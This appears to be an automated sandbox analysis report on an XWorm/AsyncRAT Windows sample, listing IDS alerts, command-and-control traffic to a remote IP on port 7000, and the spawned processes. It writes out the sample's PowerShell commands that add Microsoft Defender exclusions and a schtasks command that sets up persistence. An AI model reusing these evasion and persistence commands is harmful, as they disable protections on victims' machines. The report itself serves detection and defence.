                                                                2024-11-29T15:20:20.696552+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1103.230.121.1247000192.168.2.749829TCP
                                                                2024-11-29T15:20:20.696654+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:20.696654+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:22.535915+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1103.230.121.1247000192.168.2.749806TCP
                                                                2024-11-29T15:20:22.539252+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749806103.230.121.1247000TCP
                                                                2024-11-29T15:20:28.820631+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1103.230.121.1247000192.168.2.749806TCP
                                                                2024-11-29T15:20:28.820631+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21103.230.121.1247000192.168.2.749806TCP
                                                                2024-11-29T15:20:35.886539+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.749806103.230.121.1247000TCP
                                                                2024-11-29T15:20:36.482297+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1103.230.121.1247000192.168.2.749806TCP
                                                                2024-11-29T15:20:36.485506+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749806103.230.121.1247000TCP
                                                                2024-11-29T15:20:50.495112+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1103.230.121.1247000192.168.2.749806TCP
                                                                2024-11-29T15:20:50.497403+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749806103.230.121.1247000TCP
                                                                2024-11-29T15:20:58.830595+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1103.230.121.1247000192.168.2.749806TCP
                                                                2024-11-29T15:20:58.830595+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21103.230.121.1247000192.168.2.749806TCP
                                                                2024-11-29T15:21:04.426499+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1103.230.121.1247000192.168.2.749806TCP
                                                                2024-11-29T15:21:04.428611+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749806103.230.121.1247000TCP
                                                                2024-11-29T15:21:19.403961+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1103.230.121.1247000192.168.2.749806TCP
                                                                2024-11-29T15:21:19.404980+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749806103.230.121.1247000TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 29, 2024 15:19:07.520509958 CET4969980192.168.2.7208.95.112.1
                                                                Nov 29, 2024 15:19:07.641268015 CET8049699208.95.112.1192.168.2.7
                                                                Nov 29, 2024 15:19:07.641506910 CET4969980192.168.2.7208.95.112.1
                                                                Nov 29, 2024 15:19:07.642568111 CET4969980192.168.2.7208.95.112.1
                                                                Nov 29, 2024 15:19:07.762531042 CET8049699208.95.112.1192.168.2.7
                                                                Nov 29, 2024 15:19:08.820662022 CET8049699208.95.112.1192.168.2.7
                                                                Nov 29, 2024 15:19:08.870121002 CET4969980192.168.2.7208.95.112.1
                                                                Nov 29, 2024 15:20:07.819600105 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:07.939563990 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:07.939717054 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:07.981110096 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:08.101178885 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:14.001868963 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:14.029989958 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:14.149975061 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:15.306149960 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:15.306179047 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:15.306190014 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:15.306302071 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:15.306335926 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:15.306346893 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:15.306358099 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:15.306369066 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:15.306389093 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:15.306430101 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:15.306559086 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:15.306571007 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:15.306600094 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:15.314579010 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:15.314639091 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:15.516742945 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:15.516767979 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:15.516870975 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:15.560072899 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:15.680238962 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:15.680325031 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:15.685782909 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:15.805999994 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:15.806057930 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:15.925942898 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:15.926060915 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:16.046024084 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:16.046077967 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:16.166099072 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:16.166167974 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:16.287619114 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:16.287698030 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:16.408025026 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:16.408128977 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:16.528290987 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:16.528342962 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:16.648343086 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:16.648417950 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:16.768445015 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:16.768563986 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:16.888705969 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:16.888809919 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:17.009052038 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:17.009313107 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:17.129343033 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:17.132028103 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:17.252152920 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:17.252229929 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:17.372273922 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:17.376091957 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:17.496104002 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:17.496165037 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:17.524610996 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:17.573647976 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:17.613174915 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:17.660739899 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:17.660928011 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:17.733374119 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:17.733532906 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:17.733648062 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:17.733798981 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:17.733886003 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:17.733896017 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:17.780916929 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:17.781033039 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:17.901042938 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:17.901099920 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:18.021142006 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:18.021425009 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:18.141469955 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:18.141578913 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:18.261837959 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:18.262075901 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:18.296545029 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:18.339380026 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:18.346810102 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:18.424562931 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:18.424695015 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:18.467293978 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:18.467335939 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:18.545063019 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:18.545159101 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:18.665245056 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:18.665338993 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:18.786140919 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:18.786269903 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:18.906361103 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:18.906505108 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:18.966221094 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:18.966387987 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:19.003371954 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:19.026587963 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.086668015 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.086730003 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:19.123574018 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.123707056 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.123763084 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.123836040 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.123886108 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.206629992 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.206696987 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:19.326960087 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.327414989 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:19.447408915 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.447501898 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:19.567522049 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.567735910 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:19.619529963 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.664881945 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:19.687679052 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.784989119 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.785031080 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.785058975 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:19.785238981 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.785311937 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.785384893 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.905067921 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:19.905185938 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:20.025113106 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:20.025248051 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:20.145220995 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:20.145348072 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:20.265360117 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:20.265460968 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:20.381582975 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:20.381652117 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:20.385449886 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:20.436074972 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:20.501656055 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:20.501704931 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:20.556361914 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:20.556430101 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:20.556549072 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:20.556647062 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:20.556713104 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:20.622150898 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:20.622209072 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:20.696552038 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:20.696654081 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:20.702475071 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:20.742177963 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:20.816684008 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:20.823219061 CET700049829103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:20.823525906 CET498297000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:21.937542915 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:22.057476044 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:22.535914898 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:22.539252043 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:22.659337044 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:28.820631027 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:28.870570898 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:35.886538982 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:36.006378889 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:36.482296944 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:36.485506058 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:36.605488062 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:43.914413929 CET8049699208.95.112.1192.168.2.7
                                                                Nov 29, 2024 15:20:43.914515972 CET4969980192.168.2.7208.95.112.1
                                                                Nov 29, 2024 15:20:48.841197968 CET4969980192.168.2.7208.95.112.1
                                                                Nov 29, 2024 15:20:48.961262941 CET8049699208.95.112.1192.168.2.7
                                                                Nov 29, 2024 15:20:49.855393887 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:49.975497007 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:50.495111942 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:50.497402906 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:20:50.617286921 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:58.830595016 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:20:58.870718956 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:21:03.808777094 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:21:03.929220915 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:21:04.426498890 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:21:04.428611040 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:21:04.548547983 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:21:18.808650970 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:21:18.928783894 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:21:19.403960943 CET700049806103.230.121.124192.168.2.7
                                                                Nov 29, 2024 15:21:19.404979944 CET498067000192.168.2.7103.230.121.124
                                                                Nov 29, 2024 15:21:19.525010109 CET700049806103.230.121.124192.168.2.7
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 29, 2024 15:19:07.375252962 CET5226053192.168.2.71.1.1.1
                                                                Nov 29, 2024 15:19:07.514259100 CET53522601.1.1.1192.168.2.7
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Nov 29, 2024 15:19:07.375252962 CET192.168.2.71.1.1.10x3c66Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Nov 29, 2024 15:19:07.514259100 CET1.1.1.1192.168.2.70x3c66No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                • ip-api.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.749699208.95.112.1805668C:\Users\user\Desktop\file.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 29, 2024 15:19:07.642568111 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                Host: ip-api.com
                                                                Connection: Keep-Alive
                                                                Nov 29, 2024 15:19:08.820662022 CET175INHTTP/1.1 200 OK
                                                                Date: Fri, 29 Nov 2024 14:19:08 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 6
                                                                Access-Control-Allow-Origin: *
                                                                X-Ttl: 60
                                                                X-Rl: 44
                                                                Data Raw: 66 61 6c 73 65 0a
                                                                Data Ascii: false


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:09:19:05
                                                                Start date:29/11/2024
                                                                Path:C:\Users\user\Desktop\file.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                Imagebase:0x260000
                                                                File size:445'952 bytes
                                                                MD5 hash:9FF920C7C3199DBFFF9B507272C9F65A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2555959588.0000000012691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2555959588.0000000012691000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1250043956.0000000000262000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1250043956.0000000000262000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2523388920.0000000002681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:7
                                                                Start time:09:19:07
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:09:19:07
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:09:19:14
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:09:19:14
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:14
                                                                Start time:09:19:26
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Word.exe'
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:15
                                                                Start time:09:19:26
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:16
                                                                Start time:11:14:07
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Word.exe'
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:17
                                                                Start time:11:14:07
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:18
                                                                Start time:11:14:30
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Word" /tr "C:\Users\user\AppData\Roaming\Word.exe"
                                                                Imagebase:0x7ff60c330000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:19
                                                                Start time:11:14:30
                                                                Start date:29/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:20
                                                                Start time:11:14:30
                                                                Start date:29/11/2024
                                                                Path:C:\Users\user\AppData\Roaming\Word.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\AppData\Roaming\Word.exe
                                                                Imagebase:0xcb0000
                                                                File size:445'952 bytes
                                                                MD5 hash:9FF920C7C3199DBFFF9B507272C9F65A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Word.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Word.exe, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Word.exe, Author: ditekSHen
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 76%, ReversingLabs
                                                                Has exited:true

                                                                Target ID:23
                                                                Start time:11:14:43
                                                                Start date:29/11/2024
                                                                Path:C:\Users\user\AppData\Roaming\Word.exe
                                                                Wow64 process (32bit):false
